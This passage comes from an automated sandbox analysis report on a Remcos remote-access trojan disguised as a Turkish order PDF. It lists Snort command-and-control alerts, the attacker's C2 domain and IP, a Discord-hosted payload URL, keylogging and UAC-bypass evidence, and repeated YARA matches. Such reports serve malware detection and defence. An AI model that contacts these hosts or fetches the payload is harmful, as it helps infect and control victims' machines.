?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$cha3_2_00403C4A

                    Networking

                    Source: TrafficSnort IDS: 2845323 ETPRO TROJAN MSIL/Remcos RAT CnC Keep-Alive (Outbound) 192.168.2.3:49778 -> 37.0.14.195:5017
                    Source: TrafficSnort IDS: 2844577 ETPRO TROJAN MSIL/Remcos RAT CnC Checkin M2 192.168.2.3:49778 -> 37.0.14.195:5017
                    Source: TrafficSnort IDS: 2845324 ETPRO TROJAN MSIL/Remcos RAT CnC Keep-Alive (Inbound) 37.0.14.195:5017 -> 192.168.2.3:49778
                    Source: Malware configuration extractorURLs: Pw`~hustlelord.ddns.net
                    Source: unknownDNS query: name: blessmyhustlelord.ddns.net
                    Source: Joe Sandbox ViewASN Name: WKD-ASIE WKD-ASIE
                    Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                    Source: Joe Sandbox ViewIP Address: 162.159.130.233 162.159.130.233
                    Source: global trafficTCP traffic: 192.168.2.3:49746 -> 37.0.14.195:5017
                    Source: C:\Windows\SysWOW64\logagent.exeCode function: 3_2_1054EE74 URLDownloadToFileW,ShellExecuteW,??3@YAXPAX@Z,3_2_1054EE74
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
                    Source: Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe, 00000000.00000003.269381013.00000000007C1000.00000004.00000020.00020000.00000000.sdmp, Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe, 00000000.00000003.278138835.00000000007C1000.00000004.00000020.00020000.00000000.sdmp, Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe, 00000000.00000003.269349489.00000000007C1000.00000004.00000020.00020000.00000000.sdmp, Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe, 00000000.00000002.310588608.00000000007BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                    Source: Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe, 00000000.00000003.278138835.00000000007C1000.00000004.00000020.00020000.00000000.sdmp, Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe, 00000000.00000002.310588608.00000000007BC000.00000004.00000020.00020000.00000000.sdmp, Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe, 00000000.00000002.310005988.0000000000775000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.discordapp.com/
                    Source: Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe, 00000000.00000002.310005988.0000000000775000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.discordapp.com/.
                    Source: Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe, 00000000.00000003.278138835.00000000007C1000.00000004.00000020.00020000.00000000.sdmp, Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe, 00000000.00000002.310588608.00000000007BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.discordapp.com/2y
                    Source: Eluiezilfw.exe, 00000008.00000002.347399894.0000000003760000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/990482594137251863/990489253987360768/Eluiezilfwmdrgrdfrqpnwm
                    Source: unknownDNS traffic detected: queries for: cdn.discordapp.com
                    Source: C:\Windows\SysWOW64\logagent.exeCode function: 3_2_00402149 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,malloc,recv,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,free,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,3_2_00402149
                    Source: global trafficHTTP traffic detected: GET /attachments/990482594137251863/990489253987360768/Eluiezilfwmdrgrdfrqpnwmurrnwnhm HTTP/1.1User-Agent: lValiHost: cdn.discordapp.com
                    Source: global trafficHTTP traffic detected: GET /attachments/990482594137251863/990489253987360768/Eluiezilfwmdrgrdfrqpnwmurrnwnhm HTTP/1.1User-Agent: 21Host: cdn.discordapp.comCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /attachments/990482594137251863/990489253987360768/Eluiezilfwmdrgrdfrqpnwmurrnwnhm HTTP/1.1User-Agent: 16Host: cdn.discordapp.comCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /attachments/990482594137251863/990489253987360768/Eluiezilfwmdrgrdfrqpnwmurrnwnhm HTTP/1.1User-Agent: 91Host: cdn.discordapp.comCache-Control: no-cache
                    Source: unknownHTTPS traffic detected: 162.159.130.233:443 -> 192.168.2.3:49716 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 162.159.133.233:443 -> 192.168.2.3:49745 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 162.159.134.233:443 -> 192.168.2.3:49751 version: TLS 1.2

                    Key, Mouse, Clipboard, Microphone and Screen Capturing

                    Source: C:\Windows\SysWOW64\logagent.exeCode function: [Esc] 3_2_00405EB2
                    Source: C:\Windows\SysWOW64\logagent.exeCode function: [Enter] 3_2_00405EB2
                    Source: C:\Windows\SysWOW64\logagent.exeCode function: [Tab] 3_2_00405EB2
                    Source: C:\Windows\SysWOW64\logagent.exeCode function: [Down] 3_2_00405EB2
                    Source: C:\Windows\SysWOW64\logagent.exeCode function: [Right] 3_2_00405EB2
                    Source: C:\Windows\SysWOW64\logagent.exeCode function: [Up] 3_2_00405EB2
                    Source: C:\Windows\SysWOW64\logagent.exeCode function: [Left] 3_2_00405EB2
                    Source: C:\Windows\SysWOW64\logagent.exeCode function: [End] 3_2_00405EB2
                    Source: C:\Windows\SysWOW64\logagent.exeCode function: [F2] 3_2_00405EB2
                    Source: C:\Windows\SysWOW64\logagent.exeCode function: [F1] 3_2_00405EB2
                    Source: C:\Windows\SysWOW64\logagent.exeCode function: [Del] 3_2_00405EB2
                    Source: C:\Windows\SysWOW64\logagent.exeCode function: [Del] 3_2_00405EB2
                    Source: C:\Windows\SysWOW64\logagent.exeCode function: 3_2_10546C64 SetWindowsHookExA 0000000D,004052BA,00000000,000000003_2_10546C64
                    Source: C:\Windows\SysWOW64\logagent.exeCode function: 3_2_0040D2A6 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,SetEvent,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,GetTickCount,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,atoi,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,Sleep,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,URLDownloadToFileW,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,OpenClipboard,Sleep,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,atoi,?c_str@?$basic_string@GU?$char_trait3_2_0040D2A6
                    Source: Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe, 00000000.00000002.308934385.000000000073A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
                    Source: C:\Windows\SysWOW64\logagent.exeCode function: 3_2_0040532D GetKeyState,GetKeyState,GetKeyState,CallNextHookEx,3_2_0040532D

                    E-Banking Fraud

                    Source: Yara matchFile source: 3.2.logagent.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 15.2.DpiScaling.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 14.2.logagent.exe.10540000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.logagent.exe.1054198f.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 14.2.logagent.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 15.2.DpiScaling.exe.10540000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.logagent.exe.1054198f.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.logagent.exe.10540000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 14.2.logagent.exe.1054198f.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 15.2.DpiScaling.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.logagent.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 15.2.DpiScaling.exe.10540000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 14.2.logagent.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.logagent.exe.10540000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 15.2.DpiScaling.exe.1054198f.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 15.2.DpiScaling.exe.1054198f.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 14.2.logagent.exe.10540000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 14.2.logagent.exe.1054198f.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000000F.00000002.359362662.0000000004C00000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000E.00000002.344931678.0000000000D80000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.534117821.0000000010540000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000F.00000002.359461010.0000000010540000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000E.00000002.345028532.0000000010540000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.533899763.00000000031F0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000E.00000002.344444843.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000F.00000002.359014931.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: logagent.exe PID: 6552, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: DpiScaling.exe PID: 5936, type: MEMORYSTR

                    Spam, unwanted Advertisements and Ransom Demands

                    Source: C:\Windows\SysWOW64\logagent.exeCode function: 3_2_10554D8D SystemParametersInfoW,3_2_10554D8D

                    System Summary

                    Source: 3.2.logagent.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
                    Source: 3.2.logagent.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Remcos Payload Author: kevoreilly
                    Source: 3.2.logagent.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 15.2.DpiScaling.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
                    Source: 15.2.DpiScaling.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Remcos Payload Author: kevoreilly
                    Source: 15.2.DpiScaling.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
                    Source: 14.2.logagent.exe.10540000.1.unpack, type: UNPACKEDPE Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
                    Source: 14.2.logagent.exe.10540000.1.unpack, type: UNPACKEDPE Matched rule: Remcos Payload Author: kevoreilly
                    Source: 14.2.logagent.exe.10540000.1.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
                    Source: 3.2.logagent.exe.1054198f.2.unpack, type: UNPACKEDPE Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
                    Source: 3.2.logagent.exe.1054198f.2.unpack, type: UNPACKEDPE Matched rule: Remcos Payload Author: kevoreilly
                    Source: 3.2.logagent.exe.1054198f.2.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
                    Source: 14.2.logagent.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
                    Source: 14.2.logagent.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Remcos Payload Author: kevoreilly
                    Source: 14.2.logagent.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
                    Source: 15.2.DpiScaling.exe.10540000.1.raw.unpack, type: UNPACKEDPE Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
                    Source: 15.2.DpiScaling.exe.10540000.1.raw.unpack, type: UNPACKEDPE Matched rule: Remcos Payload Author: kevoreilly
                    Source: 15.2.DpiScaling.exe.10540000.1.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
                    Source: 3.2.logagent.exe.1054198f.2.raw.unpack, type: UNPACKEDPE Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
                    Source: 3.2.logagent.exe.1054198f.2.raw.unpack, type: UNPACKEDPE Matched rule: Remcos Payload Author: kevoreilly
                    Source: 3.2.logagent.exe.1054198f.2.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
                    Source: 3.2.logagent.exe.10540000.1.raw.unpack, type: UNPACKEDPE Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
                    Source: 3.2.logagent.exe.10540000.1.raw.unpack, type: UNPACKEDPE Matched rule: Remcos Payload Author: kevoreilly
                    Source: 3.2.logagent.exe.10540000.1.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
                    Source: 14.2.logagent.exe.1054198f.2.unpack, type: UNPACKEDPE Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
                    Source: 14.2.logagent.exe.1054198f.2.unpack, type: UNPACKEDPE Matched rule: Remcos Payload Author: kevoreilly
                    Source: 14.2.logagent.exe.1054198f.2.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
                    Source: 15.2.DpiScaling.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
                    Source: 15.2.DpiScaling.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Remcos Payload Author: kevoreilly
                    Source: 15.2.DpiScaling.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
                    Source: 3.2.logagent.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
                    Source: 3.2.logagent.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Remcos Payload Author: kevoreilly
                    Source: 3.2.logagent.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
                    Source: 15.2.DpiScaling.exe.10540000.1.unpack, type: UNPACKEDPE Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
                    Source: 15.2.DpiScaling.exe.10540000.1.unpack, type: UNPACKEDPE Matched rule: Remcos Payload Author: kevoreilly
                    Source: 15.2.DpiScaling.exe.10540000.1.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
                    Source: 14.2.logagent.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
                    Source: 14.2.logagent.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Remcos Payload Author: kevoreilly
                    Source: 14.2.logagent.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
                    Source: 3.2.logagent.exe.10540000.1.unpack, type: UNPACKEDPE Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
                    Source: 3.2.logagent.exe.10540000.1.unpack, type: UNPACKEDPE Matched rule: Remcos Payload Author: kevoreilly
                    Source: 3.2.logagent.exe.10540000.1.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
                    Source: 15.2.DpiScaling.exe.1054198f.2.raw.unpack, type: UNPACKEDPE Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
                    Source: 15.2.DpiScaling.exe.1054198f.2.raw.unpack, type: UNPACKEDPE Matched rule: Remcos Payload Author: kevoreilly
                    Source: 15.2.DpiScaling.exe.1054198f.2.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
                    Source: 15.2.DpiScaling.exe.1054198f.2.unpack, type: UNPACKEDPE Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
                    Source: 15.2.DpiScaling.exe.1054198f.2.unpack, type: UNPACKEDPE Matched rule: Remcos Payload Author: kevoreilly
                    Source: 15.2.DpiScaling.exe.1054198f.2.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
                    Source: 14.2.logagent.exe.10540000.1.raw.unpack, type: UNPACKEDPE Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
                    Source: 14.2.logagent.exe.10540000.1.raw.unpack, type: UNPACKEDPE Matched rule: Remcos Payload Author: kevoreilly
                    Source: 14.2.logagent.exe.10540000.1.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
                    Source: 14.2.logagent.exe.1054198f.2.raw.unpack, type: UNPACKEDPE Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
                    Source: 14.2.logagent.exe.1054198f.2.raw.unpack, type: UNPACKEDPE Matched rule: Remcos Payload Author: kevoreilly
                    Source: 14.2.logagent.exe.1054198f.2.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
                    Source: 00000003.00000002.534117821.0000000010540000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
                    Source: 00000003.00000002.534117821.0000000010540000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Remcos Payload Author: kevoreilly
                    Source: 00000003.00000002.534117821.0000000010540000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: REMCOS_RAT_variants Author: unknown
                    Source: 0000000F.00000002.359461010.0000000010540000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
                    Source: 0000000F.00000002.359461010.0000000010540000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Remcos Payload Author: kevoreilly
                    Source: 0000000F.00000002.359461010.0000000010540000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: REMCOS_RAT_variants Author: unknown
                    Source: 0000000E.00000002.345028532.0000000010540000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
                    Source: 0000000E.00000002.345028532.0000000010540000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Remcos Payload Author: kevoreilly
                    Source: 0000000E.00000002.345028532.0000000010540000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: REMCOS_RAT_variants Author: unknown
                    Source: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
                    Source: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Remcos Payload Author: kevoreilly
                    Source: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: REMCOS_RAT_variants Author: unknown
                    Source: 0000000E.00000002.344444843.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
                    Source: 0000000E.00000002.344444843.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Remcos Payload Author: kevoreilly
                    Source: 0000000E.00000002.344444843.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: REMCOS_RAT_variants Author: unknown
                    Source: 0000000F.00000002.359014931.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
                    Source: 0000000F.00000002.359014931.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Remcos Payload Author: kevoreilly
                    Source: 0000000F.00000002.359014931.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: REMCOS_RAT_variants Author: unknown
                    Source: Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                    Source: 3.2.logagent.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
                    Source: 3.2.logagent.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
                    Source: 3.2.logagent.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 15.2.DpiScaling.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
                    Source: 15.2.DpiScaling.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
                    Source: 15.2.DpiScaling.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 14.2.logagent.exe.10540000.1.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
                    Source: 14.2.logagent.exe.10540000.1.unpack, type: UNPACKEDPE Matched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
                    Source: 14.2.logagent.exe.10540000.1.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 3.2.logagent.exe.1054198f.2.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
                    Source: 3.2.logagent.exe.1054198f.2.unpack, type: UNPACKEDPE Matched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
                    Source: 3.2.logagent.exe.1054198f.2.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 14.2.logagent.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
